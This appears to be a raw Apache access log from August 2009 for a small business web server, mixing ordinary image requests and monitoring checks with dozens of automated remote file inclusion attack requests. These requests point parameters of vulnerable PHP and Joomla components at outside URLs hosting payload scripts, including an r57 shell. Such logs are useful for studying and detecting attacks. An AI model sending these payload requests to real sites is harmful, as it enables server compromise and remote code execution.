93.187.200.218 - - [12/Aug/2009:06:43:40 -0400] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:06:43:45 -0400] "GET /logs/access_log.Q109061200%20%20/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:06:43:45 -0400] "GET /logs/access_log.Q109062900%20%20/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:06:43:46 -0400] "GET /logs/access_log.Q109062900%20%20/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:06:43:46 -0400] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:06:43:46 -0400] "GET /logs/access_log.Q109061200%20%20/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:06:43:47 -0400] "GET /logs/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.117.85.108 - - [12/Aug/2009:06:44:13 -0400] "GET /logs/access_log.Q109051200//?_SERVER[DOCUMENT_ROOT]=http://www.figure8flow.net/sape%0D? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
217.117.85.108 - - [12/Aug/2009:06:44:13 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.figure8flow.net/sape%0D? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
217.117.85.108 - - [12/Aug/2009:06:44:14 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.figure8flow.net/sape%0D? HTTP/1.1" 200 13349 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
74.228.99.62 - - [12/Aug/2009:06:44:15 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:44:15 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:44:15 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
172.16.1.180 - - [12/Aug/2009:06:44:16 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:06:44:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:06:44:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.228.99.62 - - [12/Aug/2009:06:44:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
74.228.99.62 - - [12/Aug/2009:06:44:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322)"
220.123.239.163 - - [12/Aug/2009:06:44:23 -0400] "GET //?path%5Bdocroot%5D=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:06:44:23 -0400] "GET /logs//?path%5Bdocroot%5D=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
217.117.85.108 - - [12/Aug/2009:06:44:43 -0400] "GET /logs/access_log.Q109051200//?_SERVER[DOCUMENT_ROOT]=http://www.figure8flow.net/sape%0D? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
217.117.85.108 - - [12/Aug/2009:06:44:43 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.figure8flow.net/sape%0D? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
217.117.85.108 - - [12/Aug/2009:06:44:43 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.figure8flow.net/sape%0D? HTTP/1.1" 200 13349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
195.209.236.77 - - [12/Aug/2009:06:45:16 -0400] "GET ///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:45:16 -0400] "GET /logs/access_log.Q109071800%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:45:16 -0400] "GET /logs///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:45:16 -0400] "GET /logs/access_log.Q109051200%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Aug/2009:06:45:20 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:06:45:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:06:45:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
93.187.200.218 - - [12/Aug/2009:06:45:49 -0400] "GET /logs/access_log.Q109061200/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:06:45:49 -0400] "GET /logs/access_log.Q109062900/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:06:46:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
93.187.200.218 - - [12/Aug/2009:06:46:10 -0400] "GET /logs/access_log.Q109062900/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:06:46:10 -0400] "GET /logs/access_log.Q109061200/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.17.141.172 - - [12/Aug/2009:06:46:30 -0400] "GET /logs//s_loadenv.php?DOCUMENT_ROOT=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.17.141.172 - - [12/Aug/2009:06:46:30 -0400] "GET //s_loadenv.php?DOCUMENT_ROOT=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.17.141.172 - - [12/Aug/2009:06:46:30 -0400] "GET /logs/access_log.Q109071700//s_loadenv.php?DOCUMENT_ROOT=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
78.110.50.127 - - [12/Aug/2009:06:46:44 -0400] "GET /logs//s_loadenv.php?DOCUMENT_ROOT=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
78.110.50.127 - - [12/Aug/2009:06:46:44 -0400] "GET /logs/access_log.Q109071700//s_loadenv.php?DOCUMENT_ROOT=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
78.110.50.127 - - [12/Aug/2009:06:46:44 -0400] "GET //s_loadenv.php?DOCUMENT_ROOT=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Aug/2009:06:47:06 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:06:47:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:06:47:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
89.185.231.103 - - [12/Aug/2009:06:47:30 -0400] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://eiareality.com.br/forum/includes/test.txt?? HTTP/1.1" 404 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
89.185.231.103 - - [12/Aug/2009:06:47:30 -0400] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://eiareality.com.br/forum/includes/test.txt?? HTTP/1.1" 404 260 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
64.27.6.186 - - [12/Aug/2009:06:47:49 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:06:47:49 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:06:47:49 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:06:48:12 -0400] "GET //s_loadenv.php?DOCUMENT_ROOT=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:06:48:13 -0400] "GET /logs//s_loadenv.php?DOCUMENT_ROOT=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:06:48:18 -0400] "GET /logs//s_loadenv.php?DOCUMENT_ROOT=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:06:48:18 -0400] "GET /logs/access_log.Q109071700//s_loadenv.php?DOCUMENT_ROOT=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:06:48:18 -0400] "GET //s_loadenv.php?DOCUMENT_ROOT=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
210.218.5.234 - - [12/Aug/2009:06:48:20 -0400] "GET /logs/setup.php?dir=http://www.photopark.com/nalog/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
210.218.5.234 - - [12/Aug/2009:06:48:20 -0400] "GET /setup.php?dir=http://www.photopark.com/nalog/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
210.218.5.234 - - [12/Aug/2009:06:48:20 -0400] "GET /logs/access_log.Q109080100/setup.php?dir=http://www.photopark.com/nalog/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.218.5.234 - - [12/Aug/2009:06:48:29 -0400] "GET /logs/access_log.Q109072200/setup.php?dir=http://www.photopark.com/nalog/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:06:48:52 -0400] "GET /logs/access_log.Q109071700//s_loadenv.php?DOCUMENT_ROOT=http://scgh.hs.kr/zboard//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:06:49:31 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:06:49:31 -0400] "GET /logs/access_log.Q109060300////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:06:49:31 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 200 13351 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:06:50:24 -0400] "GET /logs/access_log.Q109070700////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:06:51:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [12/Aug/2009:06:51:51 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:06:51:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:06:51:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
128.241.53.238 - - [12/Aug/2009:06:51:59 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:06:51:59 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:06:51:59 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:06:53:23 -0400] "GET /logs/access_log.Q109060300%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:06:53:23 -0400] "GET /logs/access_log.Q109070700%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:53:32 -0400] "GET /logs/access_log.Q109051200///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:53:32 -0400] "GET /logs/access_log.Q109080500///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
158.223.1.108 - - [12/Aug/2009:06:54:13 -0400] "GET ///components/com_facileforms/facileforms.frame.php?ff_compath=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
158.223.1.108 - - [12/Aug/2009:06:54:13 -0400] "GET /logs///components/com_facileforms/facileforms.frame.php?ff_compath=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
158.223.1.108 - - [12/Aug/2009:06:54:13 -0400] "GET /logs/access_log.Q109052500%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.61.244.6 - - [12/Aug/2009:06:55:07 -0400] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 260 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
209.61.244.6 - - [12/Aug/2009:06:55:07 -0400] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 265 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
158.223.1.108 - - [12/Aug/2009:06:55:12 -0400] "GET /logs/access_log.Q109051200%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:55:30 -0400] "GET /logs/access_log.Q109051200///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:06:55:30 -0400] "GET /logs/access_log.Q109080500///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:06:55:54 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:06:56:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.123.239.163 - - [12/Aug/2009:06:57:25 -0400] "GET /logs/access_log.Q109071300%20%20//?path%5Bdocroot%5D=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:06:57:25 -0400] "GET //?path%5Bdocroot%5D=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:06:57:25 -0400] "GET /logs//?path%5Bdocroot%5D=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:06:57:45 -0400] "GET /logs/access_log.Q109051200%20%20//?path%5Bdocroot%5D=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
210.218.5.234 - - [12/Aug/2009:06:58:57 -0400] "GET /logs/access_log.Q109072500/setup.php?dir=http://www.photopark.com/nalog/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:07:00:47 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:07:01:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [12/Aug/2009:07:01:48 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:01:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:01:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
212.204.254.78 - - [12/Aug/2009:07:02:16 -0400] "GET /logs/error_log.Q109052100/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.crios.ind.br//cmdstate.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
212.204.254.78 - - [12/Aug/2009:07:02:16 -0400] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.crios.ind.br//cmdstate.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
212.204.254.78 - - [12/Aug/2009:07:02:16 -0400] "GET /logs/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.crios.ind.br//cmdstate.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
207.45.176.106 - - [12/Aug/2009:07:02:24 -0400] "GET /appserv/main.php?appserv_root=http://www.dunsanpiano.com/log/log/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
207.45.176.106 - - [12/Aug/2009:07:02:24 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.dunsanpiano.com/log/log/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
207.45.176.106 - - [12/Aug/2009:07:02:24 -0400] "GET /logs/access_log.Q109060300/appserv/main.php?appserv_root=http://www.dunsanpiano.com/log/log/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
207.45.176.106 - - [12/Aug/2009:07:02:25 -0400] "GET /logs/access_log.Q109052000/appserv/main.php?appserv_root=http://www.dunsanpiano.com/log/log/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:07:02:25 -0400] "GET /logs/error_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.204.254.78 - - [12/Aug/2009:07:02:30 -0400] "GET /logs/access_log.Q109053000/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.crios.ind.br//cmdstate.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
172.16.1.180 - - [12/Aug/2009:07:02:59 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:02:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:02:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
117.110.74.195 - - [12/Aug/2009:07:03:58 -0400] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:03:58 -0400] "GET /logs/access_log.Q109062400////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:03:58 -0400] "GET /logs/error_log.Q109061000////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Aug/2009:07:04:10 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:04:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:04:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
62.116.137.99 - - [12/Aug/2009:07:04:56 -0400] "GET /logs/access_log.Q109060900//modules/Forums/errors.php?error=http://ingrus.net/modules/Forums/images/card/r57?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
62.116.137.99 - - [12/Aug/2009:07:04:57 -0400] "GET //modules/Forums/errors.php?error=http://ingrus.net/modules/Forums/images/card/r57?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
62.116.137.99 - - [12/Aug/2009:07:04:57 -0400] "GET /logs//modules/Forums/errors.php?error=http://ingrus.net/modules/Forums/images/card/r57?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
117.110.74.195 - - [12/Aug/2009:07:06:01 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:06:01 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:06:01 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:07:06:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.27.203.107 - - [12/Aug/2009:07:06:18 -0400] "GET /logs/access_log.Q109062400////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:07:06:19 -0400] "GET /logs/error_log.Q109061000////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:07:06:19 -0400] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:06:32 -0400] "GET /logs/access_log.Q109062400%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:06:32 -0400] "GET /logs/error_log.Q109061000%20%20////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.190.183.23 - - [12/Aug/2009:07:06:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:06:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
74.190.183.23 - - [12/Aug/2009:07:06:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
